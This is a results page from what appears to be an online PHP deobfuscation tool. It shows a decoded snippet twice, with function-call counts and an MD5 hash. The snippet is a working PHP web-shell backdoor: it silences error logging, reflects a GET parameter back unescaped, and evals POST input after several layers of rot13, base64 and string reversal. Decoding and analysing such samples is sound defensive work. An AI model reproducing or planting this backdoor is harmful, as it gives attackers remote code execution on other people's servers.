Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
@error_reporting(0); @ini_set("display_errors",0); @ini_set("log_errors",0); @ini_set(..
Decoded Output download
<?
@error_reporting(0); @ini_set("display_errors",0); @ini_set("log_errors",0); @ini_set("error_log",0); if (isset($_GET['r'])) { print $_GET['r']; } elseif (isset($_POST['e'])) { eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST['e'])))))); } exit;
?>
Did this file decode correctly?
Original Code
@error_reporting(0); @ini_set("display_errors",0); @ini_set("log_errors",0); @ini_set("error_log",0); if (isset($_GET['r'])) { print $_GET['r']; } elseif (isset($_POST['e'])) { eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST['e'])))))); } exit;
Function Calls
ini_set | 3 |
error_reporting | 1 |
Stats
MD5 | 419d74e0d05d9d841fa70d1015779b4d |
Eval Count | 0 |
Decode Time | 95 ms |